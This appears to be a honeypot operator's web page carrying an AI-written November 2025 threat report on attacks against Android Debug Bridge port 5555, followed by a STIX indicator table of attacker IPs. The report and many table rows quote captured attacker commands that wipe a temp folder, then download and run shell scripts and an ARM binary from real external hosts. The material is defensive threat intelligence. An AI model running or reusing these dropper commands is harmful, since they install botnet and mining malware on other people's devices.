nadsec // adb telemetry // robert ai reporting // otx stix live //

Honeypot overview

ADB lure on 5555 with the telemetry laid bare.

Android Debug Bridge trap inside T-Pot CE. Indicators flow straight from the OTX STIX export, while Robert AI writes the monthly breakdown so you can brief stakeholders with specifics that matter.

Location: AustraliaProtocol: ADB / TCP 5555Month: November 2025

NadSec Honeypot

ADBHoney

Everything here is malicious on purpose. No production data.

Live

Data source

T-Pot CE

Raw logs to STIX to OTX pulse.

Report author

Robert AI

Summaries and snark only.

Snapshot

November 2025 Pulse

Quick stats parsed from the current month STIX export.

Monthly pulse

Unique IP indicators

0

Distinct source IPs in the STIX bundle.

Hash indicators

0

File hashes associated with ADB activity.

Indicator objects

0

Total STIX indicator objects.

Signal strength

0

Plenty of brute-force automation; little human hands.

Scope

ADB-only indicators

Signals come strictly from the ADB honeypot STIX bundle. No cross-talk from other services.

What to do

Drop into deny lists

Use IPs and hashes for blocking or enrichment. Share the pulse URL with your teammates.

Caveats

Noisy on purpose

Tune to your risk appetite before auto-blocking anything in prod.

Monthly report

Robert's November 2025 brief

Generated by Robert AI

Threat Intelligence Report:

ADBHoney → Attacker IPs – Australia – November 2025


1. Executive Summary

If you left an Android Debug Bridge (ADB) port exposed in Australia this November, you weren’t just asking for trouble—you published an open invitation for the botnet goblins to hold a barbecue in your /data/local/tmp. Analysis of ADBHoney honeypot traffic for November 2025 shows the usual suspects running amok, led by Mirai’s less sophisticated but equally loud Android cousin: ADB.Miner. Infrastructure varies from “oops, forgot to lock down our cloud VM” all the way to “industrial-scale bulletproof bot-herding.” If you aren’t explicitly shipping a product that needs port 5555, it’s time to shut the gates and salt the earth.


2. Key Stats

  • Monitoring period: November 2025
  • Honeypot Location: Australia
  • Primary Target: TCP/5555 (ADB)
  • Event count per aggressive node: Up to 1,700+ events per single host
  • Total unique attacker IPs captured: Dozens, geographically diverse
  • Noteworthy ASNs: Pfcloud UG (NL), ColocaTel (DE), Optibounce (IR), DigitalOcean, Google Cloud, Akamai
  • Observed TTPs:
    • Mirai-style scanning and infection
    • Mass download/execution of dropper scripts
    • Common payloads: trinity, log, generic shell droppers
    • Coinminer heritage, no command-and-control detected
  • Malware file hashes captured: 30+ new SHA-256s for dropper binaries

3. Campaign Narrative

Here lies November’s grand tradition: mindless botnets rising from the malware bog to probe ADB/5555 and slop malware into any device that blinks in response. The heaviest action comes courtesy of bulletproof rental nodes out of the Netherlands and Germany (Pfcloud UG, ColocaTel, and kin), each vomiting hundreds to thousands of grossly similar ADB script drops and shell command attempts. Want your Android turned into a Monero mine shaft? This is how it starts.

The story is simple and repetitive: scan, find a sucker with ADB exposed, then spam wget/curl commands to drag down shell scripts and payloads (trinity, log, whatever is in fashion this week). Indie cloud VMs—DigitalOcean, Google, Akamai—get rented for drive-by scans. The main payload is still crypto-cowboy stuff, usually mining, all wrapped up in the wormy, Mirai-derived “push-and-pray” model.

The only thing missing is a C2 server with a neon sign. This campaign is a dumb, loud, and brutal army, not a stealth operation.


4. Infrastructure Details

Bulletproof Hosting and Heavy Hitters

  • Pfcloud UG (NL), ColocaTel (DE), Optibounce (IR): Main payload artillery. Massively overrepresented in events, seen pushing scripts and cleaning up their temp folders like digital raccoons. Example IPs: 176.65.148.34 (245 events), 176.65.149.243 (223 events), 193.142.147.209 (1717 events, just showing off at this point).

Cloud Platforms (Disposable Minion Tier)

  • DigitalOcean, Google Cloud, Akamai: Rent-a-node for opportunistic scanning. Moderate noise, likely to be tossed and re-registered faster than you can say “password123”.

Asia-based ISPs

  • Vietnamese ISPs, Korea Telecom: In the middle tier. Show both scanning and actual payload deployment. A few do get creative with shell script chains.

Actual Malware Hosting

  • Notably: 61.3.102.238 (National Internet Backbone, IN) flagged as malware_hosting—the greasy kitchen behind the ADB drive-thru.

Research Scanners (or, Actually, Not)

  • None found—everyone here is genuinely misbehaving, not just poking in the name of science.

5. Malware and Behaviour

We’re in well-trodden Mirai country. Here’s the modus operandi, summed up:

  • Recon: Blasting every Australian ADB port they can find, always on TCP/5555.

  • Execution:

    • Hits with commands like:
      cd /data/local/tmp/; busybox wget http://<malware_host>/w.sh; sh w.sh; curl http://<malware_host>/c.sh; sh c.sh; wget http://<malware_host>/wget.sh; sh wget.sh
      
    • Launches binaries, e.g. nohup /data/local/tmp/trinity or nohup log
    • Survives reboots, sticks to tmp, could install a miner or worm.
  • Payload: Not many creative samples here—just dozens of nearly identical droppers, hashes all over the shop, but the MO is clear. No C2 channel observed, it’s “smash and grab” for hashing power.

References for the curious:


6. Detection and Mitigation

If you’re still exposing ADB to the internet, you need to have a long, hard think about your life choices.

  • Block or strictly limit inbound 5555/TCP anywhere not explicitly needed.
  • Monitor for:
    • Inbound connections from any IPs listed herein (Pfcloud, ColocaTel, etc.)
    • New files/scripts in /data/local/tmp/, especially named trinity, log, or after a forced package update.
  • Hunt for signs of infection:
    • Unusual CPU spikes (mining).
    • Suspicious running procs: nohup log, nohup trinity, anything in /data/local/tmp.
  • Submit captured SHA-256s to sandboxes (VirusTotal, JoeSandbox, OTX) for behavioral clustering.
  • Report abuse for cloud IPs (DigitalOcean, Google, Akamai) but don’t count on them fixing it before lunch.
  • Blacklist high-volume, persistent bulletproof ASNs—they are poison for IoT, today and tomorrow.

7. Closing Thoughts

This campaign is the cyber equivalent of seagulls at a beach picnic: directionless, noisy, and ever-present. If your Android devices are still answering calls on 5555/TCP, you’re not defending, you’re feeding the flock. The attackers are not targeting you personally—they just want your box, your CPU, and your bandwidth for their little crypto dreams.

Block, monitor, cleanse. Above all, get ADB off the internet unless you enjoy hosting free compute for someone in a bulletproof hosting swamp. This is not a drill. These aren’t research pokes. This is automated, opportunistic abuse, and every day you don’t remediate, the mess grows.

Good luck out there—remember, every port 5555 left open is another invitation for goblin shenanigans.

STIX indicators

OTX pulse export

Parsed directly from the STIX bundle. Filter, search, and copy individual indicators for quick action.

Download STIX
Showing 185 of 185
TypeValueDescriptionLabelsValid from
IPv41.25.64.168Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4103.114.106.20Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=VN; asn=135905; asn_org=VIETNAM POSTS AND TELECOMMUNICATIONS GROUP; adb_cmd_hits=0scanning_host2025-11-09
IPv4103.124.165.174Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=AL; asn=197706; asn_org=Keminet SHPK; adb_cmd_hits=0scanning_host2025-11-09
IPv4103.14.224.2Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl "scanning_host2025-11-09
IPv4103.176.113.222Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0scanning_host2025-11-09
IPv4103.183.119.48Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0scanning_host2025-11-09
IPv4103.231.249.52Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl "scanning_host2025-11-09
IPv4103.30.10.48Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl "scanning_host2025-11-09
IPv4104.248.130.34Attacker IP • ADB / seen in ADBHoney; events=63; ports=5555; cc=DE; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan; adb_cmd_hits=0scanning_host2025-11-09
IPv4107.172.33.62Attacker IP • ADB / seen in ADBHoney; events=44; ports=5555; cc=US; asn=62164; asn_org=Heymman Servers Corporation; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl "scanning_host2025-11-09
IPv4111.40.55.167Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=132525; asn_org=HeiLongJiang Mobile Communication Company Limited; adb_cmd_hits=0scanning_host2025-11-09
IPv4112.162.95.31Attacker IP • ADB / seen in ADBHoney; events=59; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity"scanning_host2025-11-09
IPv4112.87.194.251Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4112.90.220.244Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=134543; asn_org=China Unicom Guangdong IP network; adb_cmd_hits=0scanning_host2025-11-09
IPv4112.90.220.246Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=134543; asn_org=China Unicom Guangdong IP network; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4116.113.74.122Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0scanning_host2025-11-09
IPv4129.212.176.143Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4129.212.188.153Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; adb_cmd_hits=0scanning_host2025-11-09
IPv4134.209.77.110Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; adb_cmd_hits=0scanning_host2025-11-09
IPv4135.148.113.216Attacker IP • ADB / seen in ADBHoney; events=28; ports=5555; cc=US; asn=16276; asn_org=OVH SAS; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl "scanning_host2025-11-09
IPv4137.184.169.247Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=CA; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4138.197.131.20Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=CA; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv414.225.19.28Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=VN; asn=135905; asn_org=VIETNAM POSTS AND TELECOMMUNICATIONS GROUP; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl "scanning_host2025-11-09
IPv414.225.20.39Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=VN; asn=135905; asn_org=VIETNAM POSTS AND TELECOMMUNICATIONS GROUP; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl "scanning_host2025-11-09
IPv4142.93.199.16Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; adb_cmd_hits=0scanning_host2025-11-09
IPv4142.93.255.85Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; adb_cmd_hits=0scanning_host2025-11-09
IPv4143.110.171.108Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=GB; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4143.42.164.182Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0scanning_host2025-11-09
IPv4146.190.241.56Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=CA; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4146.70.188.236Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=BG; asn=9009; asn_org=M247 Europe SRL; adb_cmd_hits=0scanning_host2025-11-09
IPv4147.185.132.231Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4147.185.132.255Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0scanning_host2025-11-09
IPv4152.32.204.217Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=JP; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; adb_cmd_hits=0scanning_host2025-11-09
IPv4156.245.232.171Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=SC; asn=54801; asn_org=ZILLION-NETWORK; adb_cmd_hits=0scanning_host2025-11-09
IPv4157.245.115.28Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4157.245.118.24Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4162.142.125.125Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4167.248.133.114Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-09
IPv4167.248.133.116Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-09
IPv4167.248.133.121Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-09
IPv4167.94.138.195Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-09
IPv4167.99.1.98Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4168.126.159.29Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4172.236.228.245Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv4173.255.223.73Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0scanning_host2025-11-09
IPv4176.65.148.155Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://213.209.143.62/w.sh; sh w.sh; curl http://213.209.143.62/c.sh; sh c.s"scanning_host2025-11-09
IPv4176.65.148.34Attacker IP • ADB / seen in ADBHoney; events=245; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://213.209.143.62/w.sh; sh w.sh; curl http://213.209.143.62/c.sh; sh c.s"scanning_host2025-11-09
IPv4176.65.149.209Attacker IP • ADB / seen in ADBHoney; events=57; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://213.209.143.62/w.sh; sh w.sh; curl http://213.209.143.62/c.sh; sh c.s"scanning_host2025-11-09
IPv4176.65.149.243Attacker IP • ADB / seen in ADBHoney; events=223; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://ip/w.sh; sh w.sh; curl http://ip/c.sh; sh c.sh; wget http://ip/wget.s"scanning_host2025-11-09
IPv4178.22.24.61Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=RU; asn=209290; asn_org=Galeon LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4183.232.212.194Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=56040; asn_org=China Mobile communications corporation; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4183.232.212.195Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=56040; asn_org=China Mobile communications corporation; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4184.105.247.195Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4184.105.247.196Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4184.105.247.203Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv4184.105.247.216Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv4185.170.144.3Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=EE; asn=197414; asn_org=Xhost Internet Solutions Lp; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4185.217.0.181Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=SE; asn=42237; asn_org=w1n ltd; adb_cmd_hits=0scanning_host2025-11-09
IPv4185.224.128.14Attacker IP • ADB / seen in ADBHoney; events=35; ports=5555; cc=NL; asn=49870; asn_org=Alsycon B.V.; adb_cmd_hits=0scanning_host2025-11-09
IPv4185.224.128.19Attacker IP • ADB / seen in ADBHoney; events=33; ports=5555; cc=NL; asn=49870; asn_org=Alsycon B.V.; adb_cmd_hits=0scanning_host2025-11-09
IPv4185.242.226.59Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=202425; asn_org=IP Volume inc; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4185.243.96.116Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=UA; asn=48693; asn_org=Rices Privately owned enterprise; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4185.91.69.5Attacker IP • ADB / seen in ADBHoney; events=69; ports=5555; cc=GB; asn=201579; asn_org=Hostgnome Ltd; adb_cmd_hits=0scanning_host2025-11-09
IPv4186.220.88.42Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=BR; asn=28573; asn_org=Claro NXT Telecomunicacoes Ltda; adb_cmd_hits=0scanning_host2025-11-09
IPv4188.92.79.113Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=LV; asn=43513; asn_org=Sia Nano IT; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4193.138.7.191Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=FI; asn=50304; asn_org=Blix Solutions AS; adb_cmd_hits=0scanning_host2025-11-09
IPv4193.142.147.209Attacker IP • ADB / seen in ADBHoney; events=1717; ports=5555; cc=DE; asn=213438; asn_org=ColocaTel Inc.; adb_cmd_hits=0; cmd="cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.uhavenobotsxd; curl http://94.154.35.154/arm.uhavenobotsxd -O; chmod +x arm.uhavenobotsxd; ./ar"scanning_host2025-11-09
IPv4193.37.69.113Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=RU; asn=213194; asn_org=Nechaev Dmitry Sergeevich; adb_cmd_hits=0scanning_host2025-11-09
IPv4194.164.107.5Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=US; asn=50219; asn_org=VT-255-50219; cats=Misc activity,Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4194.180.48.148Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=DE; asn=201814; asn_org=MEVSPACE sp. z o.o.; adb_cmd_hits=0scanning_host2025-11-09
IPv4194.187.176.130Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=DE; asn=208843; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0scanning_host2025-11-09
IPv4194.187.176.149Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=DE; asn=208843; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0scanning_host2025-11-09
IPv4194.187.178.202Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=HK; asn=215778; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0scanning_host2025-11-09
IPv4194.187.178.95Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=HK; asn=215778; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0scanning_host2025-11-09
IPv4196.251.81.89Attacker IP • ADB / seen in ADBHoney; events=39; ports=5555; cc=SC; asn=401120; asn_org=CHEAPY-HOST; cats=Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv4196.251.84.60Attacker IP • ADB / seen in ADBHoney; events=42; ports=5555; cc=NL; asn=401120; asn_org=CHEAPY-HOST; cats=Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv4196.251.84.86Attacker IP • ADB / seen in ADBHoney; events=41; ports=5555; cc=NL; asn=401120; asn_org=CHEAPY-HOST; cats=Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv4197.0.29.184Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=TN; asn=37705; asn_org=TOPNET; adb_cmd_hits=0scanning_host2025-11-09
IPv4198.235.24.43Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0scanning_host2025-11-09
IPv4198.235.24.75Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0scanning_host2025-11-09
IPv4198.235.24.76Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv420.163.57.193Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=US; asn=8075; asn_org=MICROSOFT-CORP-MSN-AS-BLOCK; cats=Detection of a Network Scan; adb_cmd_hits=0scanning_host2025-11-09
IPv420.65.194.111Attacker IP • ADB / seen in ADBHoney; events=28; ports=5555; cc=US; asn=8075; asn_org=MICROSOFT-CORP-MSN-AS-BLOCK; cats=Detection of a Network Scan; adb_cmd_hits=0scanning_host2025-11-09
IPv4204.76.203.28Attacker IP • ADB / seen in ADBHoney; events=45; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; cats=Misc activity,Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4205.210.31.167Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0scanning_host2025-11-09
IPv4205.210.31.232Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0scanning_host2025-11-09
IPv4205.210.31.71Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv4205.210.31.76Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0scanning_host2025-11-09
IPv4206.168.34.198Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4206.168.34.205Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-09
IPv4206.168.34.212Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-09
IPv4206.168.34.37Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-09
IPv4206.189.120.50Attacker IP • ADB / seen in ADBHoney; events=1; ports=5555; cc=GB; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan; adb_cmd_hits=0scanning_host2025-11-09
IPv4213.209.143.126Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=DE; asn=214943; asn_org=Railnet LLC; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://213.209.143.62/w.sh; sh w.sh; curl http://213.209.143.62/c.sh; sh c.s"scanning_host2025-11-09
IPv4213.209.143.148Attacker IP • ADB / seen in ADBHoney; events=29; ports=5555; cc=DE; asn=214943; asn_org=Railnet LLC; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://213.209.143.62/w.sh; sh w.sh; curl http://213.209.143.62/c.sh; sh c.s"scanning_host2025-11-09
IPv4216.126.227.248Attacker IP • ADB / seen in ADBHoney; events=1; ports=5555; cc=US; asn=14956; asn_org=ROUTERHOSTING; adb_cmd_hits=0scanning_host2025-11-09
IPv4218.19.14.194Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0scanning_host2025-11-09
IPv4220.94.213.137Attacker IP • ADB / seen in ADBHoney; events=71; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity"scanning_host2025-11-09
IPv4221.159.61.114Attacker IP • ADB / seen in ADBHoney; events=58; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity"scanning_host2025-11-09
IPv4221.233.24.226Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv435.203.210.151Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=GB; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0scanning_host2025-11-09
IPv445.134.26.47Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=RU; asn=198953; asn_org=Proton66 OOO; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0scanning_host2025-11-09
